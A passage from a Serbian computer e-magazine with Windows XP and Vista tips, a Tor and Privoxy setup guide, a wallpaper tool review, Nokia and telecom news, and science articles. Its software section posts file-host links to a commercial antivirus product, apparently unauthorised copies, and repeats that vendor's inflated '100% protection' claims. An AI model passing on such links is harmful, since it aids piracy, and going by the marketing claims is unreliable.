Više puta kad želite da uklonite neki fajl i da dolazi do poruke o grešci dajednostavno ne može biti obrisan sa računara. Neke od poruka koje se tadapojavljuju su: "Cannot delete file: Access is denied" ili "Make sure the disk isnot full or write-protected and that the file is not currently in use".

Postoji par načina na koje možete obrisati ove fajlove na Windows XPoperativnom sistemu, kao i nekoliko besplatnih aplikacija koje mogu ovo uraditi za vas. Ukoliko želite da ovoručno uradite i da se uverite da su fajlovi stvarno obrisani trebate da prođete kroz sledeće korake:

1. Idite na Start, Search, All Files and Folders i unesite ime fajla za koji je operativni sistem prijavio da ne možeda se obriše.

2. Kada je fajl lociran, desnim klikom na njega odaberite properties i zabeležite putanju na kojoj se nalazi.

3. Zatim odaberite Start, Run upišite cmd i pritisnite enter kako bi startovali komandni prompt i ostavite ovajprozor otvoren.

4. U run dijalogu sada upišite taskmgr.exe i pritisnite enter da bi startovali Task Manager. Idite na karticuProcesses, klinite na proces explorer.exe i kliknite na End Process dugme.

5. Sada se vratite u prozor komandnog prompta da biste obrisali fajl. Iskoristite zapisanu putanju do fajla ikomandu del kako biste ga obrisali. Npr. del C:\Program Files\imefajla.exe

6. Vratite se u Task Manager, izaberite File, New Task, upišite explorer.exe i pritisnite enter.

Ovim postupkom ste ručno obrisali fajl i sada možete zatvoriti i komandni prompt i Task Manager.

Što se tiče besplatnih programa koji ovu proceduru odrađuju automatski dobro su se pokazali sledeći PocketKillBox koji je jednostavan za upotrebu, ali će obrisati i temporary fajlove, editovati Host fajl i uraditi jošmnogo toga što možda ne biste želeli u tom trenutku. Unlocker će nakon instalacije omogućiti da desnimklikom aktivirate neku od funkcija programa, a detaljno uputstvo možete naći na sajtu proizvođača. Remove onReboot Shell Extension omogućava da desnim klikom zadate da fajl bude obrisan nakon sledećeg startovanjaračunara.

Page 13: Net Majstor E-magazin Broj 3

Ubrzajte rad računara

Više različitih faktora (softverskih i hardverskih) utiče na rad i na brzinu startovanja računara i podizanjeWindows operativnog sistema. Postoji više načina da skratite vreme za koje će vaš računar doći u operativnostanje.

Ana Labović

Jedna od prvih je da napravite nekoliko jednostavnih izmena u BIOS-uračunara. Prilikom uključivanja kompjutera u BIOS možete ući pritiskom nataster koji je odredio proizvođač. Najčešće su to DEL, F1, F2, F10, itd.

U Boot podešavanjima odaberite opciju Quick Boot i namestite je na vrednostenable. Zatim nađite opciju Boot Device Priority i postavite da na prvom mestubude hard disk. Potom možete podesiti neke opcije u samom Windowsu.

Koristeći alat System Configuration Utillity možete izvršiti najviše potrebnih promena za brže podizanjesistema. Ovaj alat se već nalazi na vašem računaru i potrebno ga je samo pokrenuti: kliknite na Start meni,odaberite opciju Run, upišite msconfig i pritsnite Enter.

Izaberite Startup karticu i videćete spisak svih programa i servisa koji se startuju prilikom pokretanjaoperativnog sistema. Svaka stavka koja je čekirana automatski se učitava pri svakom ulasku u Windows.Ukoliko se na spisku nalazi veliki broj, vreme za koje će operativni sistem biti spreman za rad se produžava.Zato jednostavno možete isključiti startovanje onih stavki koje vam nisu potrebne tako što ćete odštikliratikvadrat koji se nalazi ispred njih. Naravno, morate voditi računa da ne isključite drajvere neophodne za radsamog računara. Nakon modifikacije ovog spiska restartujte računar.

Oslobodite mesto na disku

Oslobađanjem prostora na hard disku takođe ćete poboljšati performanseračunara. Alatka Disk Celanup će vam u tome pomoći omogućavajući vam dase oslobodite nepotrebnih fajlova na disku kao što su: privremeni internet iWindows fajlovi, instalirani programi koje niste dugo koristili, komponenteoperativnog sistema koje vam nisu potrebne... Da biste ovo učinili, kroz Startmeni potražite Program Files, Accessories, System Tools pa Disk Cleanup.

Scandisk alat uradiće skeniranje vašeg diska na Fajl i Disk greške, aDefragmentation alat će analizirati i defragmentirati vaš hard disk.Ovi alati se mogu naći na tabu Tools na Properties od vašeg Hard diska.

Obavezno skenirajte vaš računar na viruse i spyware komponente. Neki odbesplatnih online virus skenera možete naći na sajtovima firmi Kaspersky, F-

Secure, TrendMicro ili Symantec.

Na kraju, takođe, možete i hardverski nadograditi vaš računar dodavanjem dodatne memorije. PovećanjemRAM memorije omogućićete računaru da lakše i brže startuje programe kao i sam sistem.

Page 14: Net Majstor E-magazin Broj 3

TOR (The Onion Route)

Sta je TOR-mreza i kako se nejnom primenom moze obezbediti sigurno i anonimno surfovanjeInternetom?

Prilikom koriscenja Interneta, gotovo svaki korisnik se ponekad zapitao : Koliko sam zaista bezbedanprilikom pretrazivanja ili objavljivanja web - stranica, dok boravim na forumima, koristim mail - nalogeili pak usluge koje daju IRC – Internet Realy chat, SSH – Secure Shell i ostali TCP protokoli –Transmission Control Protocol…? Malo ozbiljnije korisnike web-a, sigurno zanima kako da svoju privatnost na Internetu zastite na nekomvisem nivou a uz to da ostanu i potpuno anonimni!?Jedno vrlo dobro a uz to I free resenje, koje ce biti opisano u daljem nastavku teksta vezano je zakoriscenje TOR-a tj. distribuirane mreze takozvanih Onion servera. Naime, koriscenjem ove mreze za anonimnost, mozemo spreciti analiziranje mreznog prometa kojismo ostvarili prilikom boravka na Internetu i tako zastiti svoju privatnost!

1. Na kom principu se zasniva rad TOR-mreze?

Analizom Internet prometa moguce je saznati mnogo o aktivnosti bilo kojeg korisnika web-a, tj.mozemo saznati podatke koje salje ili prima, njihovu velicinu, vreme slanja i jos mnogo toga, cak iakosu ti podaci kriptovani.TOR - mreza upravo stiti klijente od ovakve vrste analize njihove komunikacije, i to tako sto se unutarove mreze transport podataka vrsi uspostavljanjem kriptovanih veza izmedju veceg broja nasumicnoodabranih posrednika, odnosno preko lancano povezanih Proxy servera, koji se u ovom slucaju nazivajuOnion serveri, a od kojih ni jedan ne poznaje pravo izvoriste niti konacno odrediste podataka, ili tacnijejedan Proxy zna samo od kog Proxy servera iz lanca je dobio paket sa podacima i kojem Proxy-ju ulancu treba nadalje da ga prosledi. Tako da se veze u okviru TOR-mreze ostvaruju u koracima, a prisvakom koraku se koristi poseban enkripcijski kljuc, te se podaci koji putuju kroz TOR-mrezu visestrukokriptuju tj. u svakom koraku, sto samim tim otezava ili bolje receno onemogucava neovlascenopregledanje njihovog sadrzaja.Posto se izvorna poruka visestruko kriptovala, putujuci kroz TOR-mrezu, tako je nastala jedna viseslojnastruktura, te da bi se na krajnjem odredistu mogao videti njen pravi oblik, potrebno je samim tim ivisestruko dekriptovati tu sada vec slozenu strukturu i to pocevsi od spoljnjih slojeva kako bi se doslodo unutrasnjih tj. do izvorne poruke. Ovaj postupak visestrukog dekriptovanja se opet obavlja prekojedanog nasumicno odredjenog broja Onion servera od kojih svaki sadrzi simetrican kljuc zadekriptovanje kao i upustvo za dalje prosledjivanje poruke.Tako da se poruka putujuci kroz TOR-mrezu, s Proxy-ja na Proxy sada ljusti kao luk (onion = luk - otudaipotice naziv ovoe mreze) da bi se tek u zadnjem cvoru video njen originalan oblik.Na ovaj nacin se postize da prvi cvor u lancu zna odakle ali ne i gde saljemo podatke, a poslednji cvorlanca zna gde ali ne i odakle su podaci poslati!

Page 15: Net Majstor E-magazin Broj 3

Treba reci i to da se primaocu poruke, poslate kroz TOR-mrezu, zajedno sa poslatom porukom dostavljai Onion za odgovaranje, pa je samim tim moguce to iskoristiti da se na isti, vec opisani nacin, izvrsislanje poruke odnosno odgovora posiljaocu.

2. Kako se podesava TOR?

Operativni sistemi koji omogucavaju koriscenje TOR-mreze su svakako Windows, zatim Linux, Unix,Mac OS i BSD.Medjutim, TOR-programski paket, nakon instalacije je podesen samo kao klijent, a postavke klijentskeaplikacije nalaze se u konfiguracijskom fajlu, cija podesavanja zadovoljavaju potrebe vecine prosecnihkorisnika.Naime, pored TOR-klijenta potreban nam je i program Privoxy, koji se inace ponasa kao http/httpsProxy (by default na Portu 8118). Njegovo koriscenje je neophodno da bi se onemogucilo necijezlonamerno pristupanje nasim DNS-zahtevima (Domain Name Service), jer se u logovima naseglokalnog DNS-servera tacno mogu videti svi sajtovi koje smo posecivali, stoga koriscenjem Privoxy-jazelimo omoguciti da nas browser sa TOR-om komunicira preko socks 4a protokola, koji je u mogucnostida preko Socks Proxy-ja resava DNS zahteve.Privoxy inace treba podesiti da u radu koristi TOR-mrezu i to tako sto cemo u konfiguracijskom fajluPrivoxy-ja podesiti liniju koja se inace odnosi na TOR:forward-socks4a / 127.0.0.1:9050 .Posto Privoxy sav nas ostvareni promet zabelezava i cuva u svojim zapisnickim datotekama, da bi seonemogucio taj zapis, potrebno je da na samom pocetku tri linije unutar konfiguracijskog fajla Privoxy-ja unesemo znak # , i tako ih pokrenemo. Te tri linije su:logfile logfilejarfil jarfiledebug 1 # show each GET / COONECT requestZatim je potrebno ponovo pokrenuti Privoxy kako bi ucinjene izmene postale vazece.Da bi se, sada vec instalirani TOR i Privoxy, uskladili sa radom naseg web-browsera potrebno jepostaviti parametre u browser , a toj postavci se pristupa na sledeci nacin:-Kod Mozille i Firefox-a na Windows Operativnom Sistemu idemo na:

Tools – Options – Advanced – Network – Connection-Kod Internet Explorera radimo sledece:

Internet Option – Connections – Lan Settings – Check Proxy Server -Advanced Sada u prva cetiri protokola, a to su: HTTP, SSL, FTP i Gopher unesimo sledece:localhost, a kao Port pisemo: 8118na ovaj nacin smo izvrsili preusmerenje ka Privoxy-ju. Medjutim, u mesto za SOCKS treba uneti:localhost, a kao Port pisemo:9050cime su svi protokoli, osim prva cetiri, usmereni ka TOR-klijentu.

Nakon svih ovih podesavanja neophodno je pokrenuti Privoxy i pokrenuti TOR, kada nam se pojaviporuka:„Tor has successfully opened a circuit. Looks like cilent fuctionality is workong“

Page 16: Net Majstor E-magazin Broj 3

to znaci da smo sve dobro odradili i da mozemo poceti sa koriscenjem TOR-mreze.Jedna mala napomena pri koriscenju TOR-mreze je da tamo gde to mozemo iskljucimo Javu i ActiveXjer se oni lako mogu spojiti na neki server gde se moze zabeleziti nasa prava IP-adresa, takodje trebaiskljuciti i javascript jer on moze otkriti nasu vremensku zonu... sto moze ostaviti sumnjiv trag o nama.

Zaustavite rad zeljene aplikacije u Startup-u Windowsa Vista

U Windowsu Vista postoji default-ni panel koji vam ovo omogucava.

Da biste brzo pristupili ovom panelu, mozete otvoriti Control Panel, a zatim kucati "startup" u search box-u. Linkza "Stop a program from running at startup" momentalno se pojavljuje.

Sada mozete videti ekran Windows Defender koji vam omogucava rad sa Start-Up programima.

Mozete ukloniti, ili samo ugasiti bilo koju start-up stavku koristeci ovaj panel.Imacete pristup i mnogim drugim korisnim informacijama, pogotovo kada se malo bolje upoznate sa start-upprocesima.

Page 17: Net Majstor E-magazin Broj 3

Rad sa vise monitora

Omogucite vise razlicitih wallpaper-a na svakom desktopu u Visti ili XP-u.

Umesto da placate software za odvojene wallpaper-e, ili kreirate wallpaper u Photoshop-u, Jon Tackaburykreirao je besplatan software DisplayFusion koji vam omogucava da jednostavno postavite zasebne wallpaper-eza svaki desktop.

Jednom kada je software instaliran, primeticete novu tray ikonicu. Klikom na Desktop Wallpaper opciju izdesnog klika i menija otvoricete dijalog gde mozete podesiti wallpaper.

Mozete kliknuti na svaki desktop na displa-u i postavitit display podesavanja razlicita za svaki monitor, ilirasiriti jedan wallpaper preko oba (ili vise) monitora.

Page 18: Net Majstor E-magazin Broj 3

Ili mozete ucitati wallpaper iz Flickr, sto je sjajna mogucnost. Kucajte "vista wallpaper" i dobicete neke zaistadobre pozadine.

Ukoliko izaberete Settings iz menija tray ikonice, primeticete da ova aplikacija takodje dodaje citav set slovnihskracenica koje mogu koristiti za pomeranje prozora sa jednog monitora na drugi.

System Requirements

* Windows 2000, 2003, XP or Vista * Microsoft .NET Framework v2.0 * DisplayFusion works best with multiple screens, but it can be used with just 1

Preuzmite aplikaciju ovde : DisplayFusion

Page 19: Net Majstor E-magazin Broj 3

Programi

XP Srpski prevod

DownloadRapidShare

Mirror :Srpski_Windows_XP.rar (4.2 Mb)

Page 20: Net Majstor E-magazin Broj 3

USB Disk Security

USB Disk Security provides 100% protection against any threats via USB drive, however, the majority of otherproducts are unable even to guarantee 90% protection. USB Disk Security is the best antivirus software topermanently protect offline computer without the need for signature updates, but other antivirus software shouldupdate signature database regularly, and they cannot effectively protect offline computer. This light and easy touse solution is 100% compatible with all software and doesn't slow down your computer at all. You pay USBDisk Security once and get it all, however, other antivirus products should be paid for updates every year.

Product Highlights:

>> 100% protection against any malicious programs via USB storage

USB Disk Security uses innovative proactive technology to block any threats via USB drive. There arerelatively few products available in shops or on the Internet which offer even close to 100% protection againstany malicious programs via USB drive. The majority of products are unable even to guarantee 90% protection.USB Disk Security is the world's best software to block threats via USB drive.

>> The best solution to protect offline computer

Other antivirus software should update signature database regularly, and they cannot effectively protect offlinecomputer that is not connected to the Internet. When new viruses, worms and other malicious attacks strike,traditional signatures are insufficient. Every minute one waits for a virus signature update creates a window ofvulnerability that could have devastating consequences. USB Disk Security uses advanced proactive detectiontechniques, requires no signature updates, and closes the window of vulnerability left open by other reactive,signature-based responses.

>> The world's fastest and smallest antivirus software

With USB Disk Security, it’s not necessary to sacrifice speed for detection and scanning. Compare antivirussoftware and you'll discover that USB Disk Security is by far one of the smallest applications in the industry.For example, the v5.0 of USB Disk Security installer is just 1 MB. The program utilizes approximately 1 to 7MB of RAM.

>> 100% compatible with all software

Incompatibility between antivirus programs is an issue. In the vast majority of cases, installing two antivirusprograms from different vendors on one machine (for increased protection) is technically impossible, as the twoprograms will disrupt each other's functioning. However, USB Disk Security is 100% compatible with all

Page 21: Net Majstor E-magazin Broj 3

software, including Windows Vista.

>> Simple to use

USB Disk Security has been specifically designed to perform effectively regardless of the user’s level ofcomputer expertise. Just install and forget it.

>>> System Requirement

100MHz Processor or more, 16MB RAM or more. The operating system should be Windows 95, Windows 98,Windows 2000, Windows XP, Windows NT 4.0, Windows ME, or Vista.

Download:http://w15.easy-share.com/1700236141.html

http://rapidshare.com/files/110285132/USB_Disk_Security_V5.0.0.55.rar

Arcadia PhotoPerfect

PhotoPerfect combines the power of a professional photo editing software with the simplicity of one-click imageoptimizations to give photo enthusiasts, semi-professional and professional photographers the ability to create the bestpossible images. Start using this photo editor with one-click photo optimizations; then challenge yourself to achieve yourdream shot. PhotoPerfect offers you every photo enhancement functionality in one easy-to-use program. Learn herewhy PhotoPerfect is the best choice for every-day photography tasks and at the same time for professional and semi-professional photographers. Imagine you have just returned from a great vacation and hundreds of pictures on yourmemory card. Do you have the time to individually optimize every single photo? Usually not! But thanks to PhotoPerfectapplying the Xe847 Auto-Optimization to a complete directory full of pictures is also super easy.

Some features:- Fully automized one click image optimization with the included algorithm Xe847- Brightness and contrast correction- Correction of flash effects, backlight effects and shadow brightening- Remove red eye effects

Page 22: Net Majstor E-magazin Broj 3

- Saturation setting (also selective)- Comprehensive histogram correction facilities- Perform retrospective white balance- Color balance, color temperature, stepless channel switch- Noise suppression / Color noise suppression- Various advanced softening and sharpening tools (USM)- Lab curves for editing images in Lab color space- Band filter for removal of symmetrical distortion- 16 bit support for RAW and TIFF files- Import and edit RAW files- Merging with Dynamic Range Increase (DRI)- Remove color casts using multi-stage gray balance technique- Comprehensive masking functions- Color vibrance for selectively tweaking the saturation of over- or under saturated areas- Intelligent retouching function with repair and remove brushes- MonochromiX extension for advanced black & white (grayscale) conversion- Color management for monitor display and output on various devices- Remove hot pixels and stuck pixels- Cut images to predefined or custom formats- Retouching (free drawing, cloning, shading etc.)- Insert logo, date and text- Lossless rotation and cropping- Measure and mark image content- Savable window and key combination profiles- Integrated scripting engine for VB- und JScripts- Improved support for Photoshop compatible plugins- Send images by email directly from PhotoPerfect- Image conversion into various formats- Integrated, fast image viewer- New, scriptable batch processing

Size: 12.7 MB

Download

Page 23: Net Majstor E-magazin Broj 3

Mobilna telefonija

"Pametnice" iz Nokijine kuhinje

Nokija je u utorak, 26.08. predstavila dva nova multimedijalna mobilna telefona N serije pod oznakama N79 i N85. Fincise trude da zadrže vodeću poziciju među proizvođačima „pametnih telefona”, kojih je prodato 32,2 miliona samo uprvom tromesečju 2008. godine. Gotovo polovina (45 odsto) svetskog tržišta pripada Nokiji, za kojom slede Blekberi(13,4 odsti) i Epl (5,3 odsto).POVEZIVANJE - „Nokija N79” je monoblok, težak 97 grama, opremljen kolornim displejom dijagonale 6,1 cm, kameromod 5 megapiksela (Karl Cajs optika) sa dva LED blica, 2.0 „blututom”, TV izlazom, radiom sa FM prijemnikom, priključkomza slušalice (3,5 mm) i sa deset „N-gage” video-igara. Mikro SD kartica od 4 gigabajta dovoljna je da smestite 3.000pesama, 2.500 fotografija ili 4 sata video-klipova DVD kvaliteta (30 slika u sekundi). Poklon je tromesečno besplatnokorišćenje navigacije.Podržava super brzi 3.5G, kao i GPS i Wi-Fi. Gotovo je identičnih dimenzija kao „nokija N78”, a prodavaće se po ceni od350 evra u pet različitih boja - svetloplavoj, beloj, koral crvenoj, espreso braon i maslinastozelenoj.Model „nokija N85” (težina 128 grama) je dual-slajder, slično N96 telefonu. Kao i N79, raspolaže kamerom od 5megapiksela (autofokus), ali ima za pola centimetara dužu dijagonalu OLED displeja. U paketu s telefonom dobija se imikro SD kartica od 8 gigabajta. Sve ostale karakteristike (3.5G, radio s FM prijemnikom, 10 „N-gage” igara...) identičnesu modelu N79, osim naravno cene, jer će se N85 od oktobra prodavati za 450 evra. Baterija bi trebalo da bude dovoljnaza 28 sati rada.Očekuje se da će N85 biti pun pogodak, jer u jednom ujedinjuje tri modela - N81 (igrački tasteri i dizajn), N96 (elegantnidual-slajder) i N95 (funkcije) po prilično razumnoj ceni. „Nokija N85“ je zamišljena kao zaokruženi paket mobilne zabaveza povezivanje, razmenu i otkrivanje.

Nokia ugradila slabiji procesor u N96

Nokia ugradila slabiji procesor u N96!?Zapisano u (Hardware, Mobilni telefoni, Razno) | Autor: X3mE | Datum: 25-07-2008

Video sam jednu jako zanimljivu stvar upravo. Naime, upoređujući novi Samsung INNOV8 sa specifikacijama Nokije N96,primetio sam nešto što mi je do sad promicalo (ili je nedavno ispravljeno na Nokijinom sajtu), a to je da Nokia N96,najbolji telefon u Nokijinom repertoaru i njeno novo čudo i uzdanica za duže vreme, ima procesor radnog takta namizernih 264 MHz. Ne znam da li je ovo greška, ali ako jeste - bolje bi bilo Nokiji da to ispravi, i to brzo. Dovoljno je to štoje baterija mnogo manjeg kapaciteta nego što bi trebalo.

Page 24: Net Majstor E-magazin Broj 3

Nokia je do sad u svoje novije s60v3 telefone ugrađivala dve vrste procesora:1) Single procesore, oznake ARM 11, radnog takta na 369 MHz.2) Dual procesore (sa dodatnom FPU), oznake takođe ARM 11, radnog takta na 332 Mhz.Obično su Nokijini vrhunski Nseries modeli (poput recimo N95 ili N82) imali i dodatni 3D Graphics Hardware Accelerator,koji je dodatno rasterećivao glavni CPU.

Što se N96 tiče, ne samo da nema 3D Graphics Hardware Accelerator, već je i radni takt oboren na mizernih 264 MHz.Tačno je da se radi o Dual CPU, ali opet ispada da N96 ima jedan od najslabijih procesora od svih s60v3 telefona. Sad,možda bi čovek pomislio da je greška, ali CPU ima čak i drugu oznaku - ARM 9. Možda ima neke nenavedenekarakteristike (možda mnogo veći keš?) koje bi ga izdvojile od ostalih procesora, ali sve mi se čini da je Nokia na ovompolju uštedela. Što me još više odvlači ka pomenutom Samsungu.

Nokia drži 40% tržišta mobilniih

Nokia, najveći svetski proizvođač mobilnih telefona, ostvarila je u čevrtom kvartalu 2007. povećanje dobiti za 44 odsto.Neto dobit finske kompanije u četvrtom tromesečju prošle godine iznosio je 1,84 milijarde evra ili 47 evrocenti po akciji,što nadmašuje očekivanja Blumbergovih analitičara koji su predviđali dobit od 1,51 milijarde dolara. Prihodi kompanijeporasli su za 37 odsto na 15,7 milijardi evra.

Tržišni udeo Nokije bio je u četvrtom kvartalu veći nego zajednički udeo Motorole, Samsunga i Soni Eriksona, njenihnajvećih konkurenata. Samsung i LG ciljaju visoku klasu mobilnih.

Samsung Electronics i LG Electronics ozbiljno ciljaju visoku klasu mobilnih telefona. Te dve kompanije su došle dozaključka da korisnici često više cene funkcionalnost i dizajn od cene.

Zvaničnici kompanije Samsung navode da kompanija planira da proda oko 50 miliona mobilnih telefona skupljih od 200dolara u ovoj godini. Očekuje se da će Samsung prodati oko 200 miliona mobilnih telefona u 2008. Poređenja radi, u2007. godini je južnokorejski gigant prodao 161.1 milion mobilnih telefona i trenutno drži drugo mesto na svetskomnivou.

LG ima slične planove - oko 40 miliona telefona skupljih od 200 dolara. Pri svemu tome, LG planira da ukupno isporučioko 100 miliona mobilnih telefona, tako da će telefoni više klase u njegovim isporukama imati značajniji udeo. LGtrenutno drži peto mesto top liste proizvođača mobilnih telefona. Kompanija očekuje da će se u ovoj godini u zemljamau razvoju potražnja za mobilnim telefonima više klase povećati za oko 50 procenata.

Page 25: Net Majstor E-magazin Broj 3

Telenor omogucio prvi mobilni poziv iz aviona na svetu

Fornebu, 25. mart 2008 – Prvi na svetu dozvoljeni poziv sa mobilnog telefona u toku komercijalnog avionskogleta obavljen je pošto je kompanija „Emirates Airline“ uspešno uvela sistem AeroMobile, zajednički poduhvatTelenora i ARINC..Ovaj razgovor označava početak redovne upotrebe usluga mobilne telefonije i slanja i primanja podatka uavionima. Studije na terenu i tržišna istraživanja nedvosmileno pokazuju da je većini putnika, posebnoposlovnim ljudima i onima koji često lete, veoma važno da imaju mogućnost mobilne komunikacije tokom leta.

Rešenje AeroMobile-a omogućava putnicima da bezbedno koriste svoje mobilne telefone tokom leta, potpunoisto kao kad su na Zemlji. Pozivi se naplaćuju sa postojećeg mobilnog računa putnika kao međunarodni pozivi uromingu.

„Većina ljudi ceni mogućnost da komunicira u svakoj prilici, pa i kad lete. Osim što nudi prvoklasnu uslugumobilne telefonije u 12 zemalja, Telenor ima bogato iskustvo u oblasti satelitskih komunikacija, koje su ključneza mobilnu komunikaciju na brodovima i u avionima. AeroMobile je prirodno proširenje Telenorove ponudemobilnih usluga. Ponosni smo što smo zahvaljujući AeroMobile predvodnici na ovom novom tržištu,“ rekao jeBjarne Omot, potpredsednik Telenora i predsednik Upravnog odbora AeroMobile-a.

Prvi poziv je obavljen na letu EK751 avio kompanije Emirata između Dubaija i Kazablanke 20. marta, pošto sudobijene sve potrebne dozvole.AeroMobile

AeroMobile Limited je kompanija sa sedištem u Velikoj Britaniji u vlasništvu Telenor ASA i ARINC Inc. Uodgovoru na tržišnu potražnju, Kompanija od 2003. godine teži da omogući bezbednu upotrebu mobilnihtelefona i PDA (ručnih kompjutera) putnika. AeroMobile pruža celokupno rešenje za avio kompanije koje želeda ponude svojim putnicima i osoblju usluge mobilnih komunikacija na letovima. AeroMobile je prvakomercijalno dostupna tehnologija mobilnih komunikacija na letovima. Sistem AeroMobile ima interfejs sapostojećim i budućim sistemima komunikacija vazduh-zemlja i koncipiran je tako da je u potpunosti u skladu savažećim zahtevima za izdavanje uverenja za vazduhoplove/letivost i regulatornim zahtevima zemaljskihtelekomunikacija. Za više informacija pogledajte

http://www.aeromobile.net

Vip i Vodafon intenziviraju ekskluzivno strateško partnerstvo

Page 26: Net Majstor E-magazin Broj 3

Vip mobile i Vodafon, vodeća međunarodna grupacija iz oblasti mobilnih komunikacija u svetu, danas su svečano najavilida će intenzivirati svoje ekskluzivno strateško partnerstvo.

Vipovi korisnici će se pridružiti Vodafonovoj globalnoj zajednici koja trenutno ima više od 520 miliona članova širomsveta: krajem 2007. godine Vodafon je imao preko 252 miliona korisnika u 25 zemalja na 5 kontinenata u kojima imadirektne investicije. Vodafon je dodatno prisutan i na 41 partnerskom tržištu, sa 270 miliona korisnika u više od 60zemalja.

Vodafon je najavio da će u Srbiji sarađivati ekskluzivno sa kompanijom Vip mobile.

“Srbija je važno tržište telekomunikacija u Evropi koje se ubrzano razvija. Zato nam je drago što je Vodafon sada, krozpartnerstvo sa Vipom, u mogućnosti da ovdašnjim korisnicima ponudi kompletnu paletu internacionalnih proizvoda iusluga. Zadovoljni smo dugoročnom, veoma dobrom saradnjom sa mobilkom austria grupom, koja je poznata kao lider uinovacijama i po primeni visokih standarda poslovanja, i drago nam je što sada našu saradnju proširujemo i na Srbiju“,rekao je Pol - Gerhard Itjeshorst, izvršni direktor Vodafona za partnerska tržišta.

Vip je prvi operater u Srbiji koji je ponudio Blackberry® iz Vodafona u decembru 2007. godine.

“Parnerstvo Vipa i Vodafona donosi mnoge pogodnosti korisnicima. Ono spaja iskustvo vodeće međunarodne grupacijeu oblasti mobilnih komunikacija u svetu i Vipovo poznavanje lokalnog tržišta, tako da će korisnici uživati u najboljem odoba sveta“, rekao je Alexander Šperl, predsednik Upravnog odbora Vip mobile.

Zahvaljujući ovom partnerstvu, Vipovim korisnicima će u budućnosti biti ponuđene još inovativnije usluge i ekskluzivnitelefoni, a imaće i pristup Vodafonovoj mreži međunarodnog rominga.Kako je objašnjeno na današnjoj konferenciji za novinare, oba partnera nastaviće da posluju kao nezavisne kompanije, aliVip ima ekskluzivno pravo da svojim korisnicima nudi Vodafonove proizvode i usluge.Nekoliko članica mobilkom austria grupe, kao što su mobilkom austria (Austrija), Vipnet (Hrvatska), Mtel (Bugarska) iSi.mobil (Slovenija) već su sklopile partnerstvo sa Vodafonom.Vip mobile će dodati Vodafonov logo na sve proizvode i usluge koje bude nudio srpskom tržištu kao rezultat ovogpartnerstva.

Page 27: Net Majstor E-magazin Broj 3

Nauka

Zemlju ce progutati Sunce

Zemlju će nakon sagorevanja progutati umiruće Sunce - to je sudbina koju je našoj planeti predvideo Robert Smit,poznati britanski astronom, a koja nas čeka za 7,6 milijardi godina.

Ovaj neuobičajen proračun Smit je objavio u britanskom časopisu „Astrofiziks“. Smit, koji predaje astronomiju naUniverzitetu u Saseksu, na jugu Engleske, tvrdi da će Sunce, kada ostane bez goriva, početi da se širi u opasnog crvenogdžina.Prema njegovom mišljenju, iako će u tom procesu sagoreti, Zemlja će uspeti da izbegne potpuno uništenje.Smit kaže da će i pre te kataklizme život na Zemlji postati nepodnošljiv. Za milijardu godina, kako se Sunce bude polakoširilo, okeani će isparavati, puneći atmosferu vodenom parom i podižući temperature na Zemlji.Smit smatra da naša planeta ima dve mogućnosti da izbegne tu strašnu kob. Jedna je da iskoristi gravitacioni trzajizazvan prolaskom asteroida koji će odvući Zemlju van opasne zone. Jedan ovakav trzaj svakih 6.000 godina bio bidovoljan da naša planeta preživi najmanje pet milijardi godina, osim ako usled loših proračuna asteroid ne padne naZemlju umesto da prođe tik pored nje.„Sigurnije rešenje bilo bi da se sagradi flota interplanetarnih splavova koji bi stalno mogli da manevrišu van domašajaSunca, ali, ipak, dovoljno blizu da koriste njegovu energiju“, kazao je Smit.

Pet velikih pitanja o zivotu

Kako je zivot poceo?

Pre 4 milijarde godina, Zemlja je iznutra bila super zagrevana nuklearnom i gravitacionom energijom, a spolja razaranaudarima asteroidima. U to vreme nije izgledala baš kao stvorena za nastanak života - ali ipak, to se dogodilo.

Još pre 50 godina je dokazano u laboratorijskim uslovima da su amino kiseline, osnovna građa proteina, mogle nastati nasprženoj Zemlji izloženoj raznim kosmičkim i UV zracima. Ali danas se smatra da su prvo postale RNK, koje nisu samoprenosile informacije, već su delovale i kao primitivni enzimi, katalizatori životnih procesa.

Možda je pitanje nastanka života više geološko nego biološko pitanje. Trebalo bi uzeti u obzir geohemijsko okruženjerane Zemlje i zapitati se gde su se materija i energija mogle spojiti kako bi proizvele životne strukture i kakve bitermodinamičke i hemijske reakcije bile neophodne. Prvobitna Zemlja mogla je da ponudi samo dva prostora moguća zanastanak života: u nasipima nataloženih minerala na kiselim izvorima na obodu okeana, ili na alkalnim izvorištima negdena dnu okeana. Oba tipa staništa neprekidno stvaraju materiju i energiju i šalju je u okean, oba su dobro zaštićena idanas su naseljena živim organizmima.

Page 28: Net Majstor E-magazin Broj 3

Ako je život i započeo na ovim mestima, kakoje izgledao" Verovatno poput nepokretnih jedinjenja gvožđa i sumpora -balončića. Polupropustljive, poluprovodljive i sposobne za katalizaciju, ove membrane su prethodile organskimmembranama, i, najvažnije, spajale su molekularnu građu, pružajući odgovarajuće okruženje za životne hemijskeprocese.

Ako su jedinjenja gvožđa i sumpora zaista učestvovala u stvaranju života na Zemlji, onda bi ovi beživotni mehurići mogliodigrati istu ulogu na bilo kojoj vlažnoj, kamenoj, suncem obasjanoj planeti u svemiru. Tako bi se nastanak života mogaodogoditi bilo gde u svemiru i trajati sve dok ima vode u tečnom stanju.

Kako mutacije vode do evolucije?

Genetske mutacije su osnovni materijal evolucije. Ali koje su mutacije važne" Biolozi su po tradiciji naglašavali promeneu genima - DNK sekvencama koje nose šifru za proteine. Pretpostavka je da se takve mutacije dešavaju povremeno kodproteina sa drugačijim nizom amino kiselina koje daju pojedincu prednost u preživljavanju i vode evoluciji kroz prirodnuselekciju. Međutim, neki geni se uopšte ne menjaju milionima godina. Da li se ovakav spor tempo može odnositi naevoluciju morfologije i ponašanja"

U skorije vreme došlo se do otkrića važne uloge koju u adaptivnoj evoluciji igraju mutacije u regionima DNK kojiupravljaju ispoljavanjem gena. U prošloj deceniji otkriveni su Hox geni koji postoje kod različitog broja životinja, odvinske mušice do čoveka. Čini se da je evolucija očuvala gene, a izmenila njihovu interakciju i regulaciju kako bi nastaletako različite životinje, Takozvana cis regulacija dozvoljava organizmu da bira između različitih oblika istog gena,proizvodeći nešto drugačije proteine. Regulacija nam otkriva da više nije dovoljno posmatrati evoluciju iz ugla jednoggena. Sada postaje jasno da se mogu otkriti čitave mreže gena, što će povećati našu sposobnost da razumemo kakomutacije uzrokuju adaptivne promene uformi i funkcijama.

Kako nastaju nove vrste?

